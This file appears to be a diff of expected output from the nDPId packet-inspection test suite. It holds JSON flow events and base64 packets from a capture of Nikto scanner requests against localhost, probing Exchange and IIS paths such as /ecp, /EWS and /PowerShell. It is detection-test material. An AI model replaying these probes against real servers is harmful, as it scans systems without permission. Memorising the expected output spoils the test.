+00782{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":80,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":80,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276786,"flow_last_seen":1576420276786,"flow_idle_time":7580000,"flow_min_l4_payload_len":169,"flow_max_l4_payload_len":169,"flow_tot_l4_payload_len":169,"flow_avg_l4_payload_len":169,"midstream":1,"thread_ts_msec":1576420276786,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49702,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":81,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":81,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276787,"flow_last_seen":1576420276787,"flow_idle_time":7580000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":133,"flow_avg_l4_payload_len":133,"midstream":1,"thread_ts_msec":1576420276787,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49704,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00655{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":81,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":81,"flow_packet_id":1,"flow_last_seen":1576420276787,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":199,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":199,"pkt_l4_len":165,"thread_ts_msec":1576420276787,"pkt":"AAAAAAAAAAAAAAAACABFAAC5+PtAAEAGQ0F\/AAABfwAAAcIoH5AY5sDVvq1OaYAYAED+rQAAAQEICp1m+1udZvtbR0VUIC9ScGMgSFRUUC8xLjANCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpoZWFkZXJzOiBJSVMgaW50ZXJuYWwgSVApDQoNCg=="} -00782{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":81,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":81,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276787,"flow_last_seen":1576420276787,"flow_idle_time":7580000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":133,"flow_avg_l4_payload_len":133,"midstream":1,"thread_ts_msec":1576420276787,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49704,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
+00782{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":81,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":81,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276787,"flow_last_seen":1576420276787,"flow_idle_time":7580000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":133,"flow_avg_l4_payload_len":133,"midstream":1,"thread_ts_msec":1576420276787,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49704,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":82,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":82,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276789,"flow_last_seen":1576420276789,"flow_idle_time":7580000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":147,"midstream":1,"thread_ts_msec":1576420276789,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49706,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00671{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":82,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":82,"flow_packet_id":1,"flow_last_seen":1576420276789,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":213,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":213,"pkt_l4_len":179,"thread_ts_msec":1576420276789,"pkt":"AAAAAAAAAAAAAAAACABFAADHn6dAAEAGnId\/AAABfwAAAcIqH5DNYaeJfxts9oAYAED+uwAAAQEICp1m+12dZvtdR0VUIC9FV1MvU2VydmljZXMud3NkbCBIVFRQLzEuMA0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OmhlYWRlcnM6IElJUyBpbnRlcm5hbCBJUCkNCg0K"} -00782{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":82,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":82,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276789,"flow_last_seen":1576420276789,"flow_idle_time":7580000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":147,"midstream":1,"thread_ts_msec":1576420276789,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49706,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
+00782{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":82,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":82,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276789,"flow_last_seen":1576420276789,"flow_idle_time":7580000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":147,"midstream":1,"thread_ts_msec":1576420276789,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49706,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":83,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":83,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276790,"flow_last_seen":1576420276790,"flow_idle_time":7580000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":133,"flow_avg_l4_payload_len":133,"midstream":1,"thread_ts_msec":1576420276790,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49708,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00655{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":83,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":83,"flow_packet_id":1,"flow_last_seen":1576420276790,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":199,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":199,"pkt_l4_len":165,"thread_ts_msec":1576420276790,"pkt":"AAAAAAAAAAAAAAAACABFAAC5NBFAAEAGCCx\/AAABfwAAAcIsH5ClBgwj7e4RBIAYAED+rQAAAQEICp1m+16dZvteR0VUIC9lY3AgSFRUUC8xLjANCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpoZWFkZXJzOiBJSVMgaW50ZXJuYWwgSVApDQoNCg=="} -00782{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":83,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":83,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276790,"flow_last_seen":1576420276790,"flow_idle_time":7580000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":133,"flow_avg_l4_payload_len":133,"midstream":1,"thread_ts_msec":1576420276790,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49708,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
+00782{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":83,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":83,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276790,"flow_last_seen":1576420276790,"flow_idle_time":7580000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":133,"flow_avg_l4_payload_len":133,"midstream":1,"thread_ts_msec":1576420276790,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49708,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":84,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":84,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276792,"flow_last_seen":1576420276792,"flow_idle_time":7580000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":133,"flow_avg_l4_payload_len":133,"midstream":1,"thread_ts_msec":1576420276792,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49710,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00655{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":84,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":84,"flow_packet_id":1,"flow_last_seen":1576420276792,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":199,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":199,"pkt_l4_len":165,"thread_ts_msec":1576420276792,"pkt":"AAAAAAAAAAAAAAAACABFAAC5lANAAEAGqDl\/AAABfwAAAcIuH5BArawwwOPk6IAYAED+rQAAAQEICp1m+1+dZvtfR0VUIC9PQUIgSFRUUC8xLjANCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpoZWFkZXJzOiBJSVMgaW50ZXJuYWwgSVApDQoNCg=="} -00782{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":84,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":84,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276792,"flow_last_seen":1576420276792,"flow_idle_time":7580000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":133,"flow_avg_l4_payload_len":133,"midstream":1,"thread_ts_msec":1576420276792,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49710,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
+00782{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":84,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":84,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276792,"flow_last_seen":1576420276792,"flow_idle_time":7580000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":133,"flow_avg_l4_payload_len":133,"midstream":1,"thread_ts_msec":1576420276792,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49710,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":85,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":85,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276793,"flow_last_seen":1576420276793,"flow_idle_time":7580000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420276793,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49712,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":85,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":85,"flow_packet_id":1,"flow_last_seen":1576420276793,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":209,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":209,"pkt_l4_len":175,"thread_ts_msec":1576420276793,"pkt":"AAAAAAAAAAAAAAAACABFAADD2QRAAEAGYy5\/AAABfwAAAcIwH5DBGuEtmiy9f4AYAED+twAAAQEICp1m+2GdZvthR0VUIC9hc3BuZXRfY2xpZW50IEhUVFAvMS4wDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6aGVhZGVyczogSUlTIGludGVybmFsIElQKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="} -00782{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":85,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":85,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276793,"flow_last_seen":1576420276793,"flow_idle_time":7580000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420276793,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49712,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
+00782{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":85,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":85,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276793,"flow_last_seen":1576420276793,"flow_idle_time":7580000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420276793,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49712,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":86,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":86,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276794,"flow_last_seen":1576420276794,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420276794,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49714,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00663{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":86,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":86,"flow_packet_id":1,"flow_last_seen":1576420276794,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"thread_ts_msec":1576420276794,"pkt":"AAAAAAAAAAAAAAAACABFAADAoqZAAEAGmY9\/AAABfwAAAcIyH5C3W5qL6yWPx4AYAED+tAAAAQEICp1m+2KdZvtiR0VUIC9Qb3dlclNoZWxsIEhUVFAvMS4wDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6aGVhZGVyczogSUlTIGludGVybmFsIElQKQ0KDQo="} -00782{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":86,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":86,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276794,"flow_last_seen":1576420276794,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420276794,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49714,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
+00782{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":86,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":86,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276794,"flow_last_seen":1576420276794,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420276794,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49714,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":87,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":87,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276796,"flow_last_seen":1576420276796,"flow_idle_time":7580000,"flow_min_l4_payload_len":135,"flow_max_l4_payload_len":135,"flow_tot_l4_payload_len":135,"flow_avg_l4_payload_len":135,"midstream":1,"thread_ts_msec":1576420276796,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49716,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00655{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":87,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":87,"flow_packet_id":1,"flow_last_seen":1576420276796,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":201,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":201,"pkt_l4_len":167,"thread_ts_msec":1576420276796,"pkt":"AAAAAAAAAAAAAAAACABFAAC74FpAAEAGW+B\/AAABfwAAAcI0H5AdBth42VHy84AYAED+rwAAAQEICp1m+2SdZvtkR0VUIC4gSFRUUC8xLjANClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpoZWFkZXJzOiBXZWJMb2dpYyBpbnRlcm5hbCBJUCkNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"} -00782{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":87,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":87,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276796,"flow_last_seen":1576420276796,"flow_idle_time":7580000,"flow_min_l4_payload_len":135,"flow_max_l4_payload_len":135,"flow_tot_l4_payload_len":135,"flow_avg_l4_payload_len":135,"midstream":1,"thread_ts_msec":1576420276796,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49716,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
+00782{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":87,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":87,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276796,"flow_last_seen":1576420276796,"flow_idle_time":7580000,"flow_min_l4_payload_len":135,"flow_max_l4_payload_len":135,"flow_tot_l4_payload_len":135,"flow_avg_l4_payload_len":135,"midstream":1,"thread_ts_msec":1576420276796,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49716,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":88,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":88,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276797,"flow_last_seen":1576420276797,"flow_idle_time":7580000,"flow_min_l4_payload_len":175,"flow_max_l4_payload_len":175,"flow_tot_l4_payload_len":175,"flow_avg_l4_payload_len":175,"midstream":1,"thread_ts_msec":1576420276797,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49718,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00711{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":88,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":88,"flow_packet_id":1,"flow_last_seen":1576420276797,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":241,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":241,"pkt_l4_len":207,"thread_ts_msec":1576420276797,"pkt":"AAAAAAAAAAAAAAAACABFAADj87RAAEAGSF5\/AAABfwAAAcI2H5ABU8uetZ1IA4AYAED+1wAAAQEICp1m+2WdZvtlR0VUIC8gSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkFjY2VwdC1FbmNvZGluZzogZGVmbGF0ZSwgZ3ppcA0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OmhlYWRlcnM6IEJSRUFDSCBUZXN0KQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01050{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":88,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":88,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276797,"flow_last_seen":1576420276797,"flow_idle_time":7580000,"flow_min_l4_payload_len":175,"flow_max_l4_payload_len":175,"flow_tot_l4_payload_len":175,"flow_avg_l4_payload_len":175,"midstream":1,"thread_ts_msec":1576420276797,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49718,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:headers: BREACH Test)"}} 
+01050{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":88,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":88,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276797,"flow_last_seen":1576420276797,"flow_idle_time":7580000,"flow_min_l4_payload_len":175,"flow_max_l4_payload_len":175,"flow_tot_l4_payload_len":175,"flow_avg_l4_payload_len":175,"midstream":1,"thread_ts_msec":1576420276797,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49718,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:headers: BREACH Test)"}} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":89,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":89,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276801,"flow_last_seen":1576420276801,"flow_idle_time":7580000,"flow_min_l4_payload_len":123,"flow_max_l4_payload_len":123,"flow_tot_l4_payload_len":123,"flow_avg_l4_payload_len":123,"midstream":1,"thread_ts_msec":1576420276801,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49720,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00639{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":89,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":89,"flow_packet_id":1,"flow_last_seen":1576420276801,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":189,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":189,"pkt_l4_len":155,"thread_ts_msec":1576420276801,"pkt":"AAAAAAAAAAAAAAAACABFAACv4YVAAEAGWsF\/AAABfwAAAcI4H5Af9dm0Z318ZoAYAED+owAAAQEICp1m+2mdZvtpR0VUIC8gSFRUUC8xLjANCk5pa3RvOiAfDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6QFRFU1RJRCkNCg0K"} -00782{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":89,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":89,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276801,"flow_last_seen":1576420276801,"flow_idle_time":7580000,"flow_min_l4_payload_len":123,"flow_max_l4_payload_len":123,"flow_tot_l4_payload_len":123,"flow_avg_l4_payload_len":123,"midstream":1,"thread_ts_msec":1576420276801,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49720,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 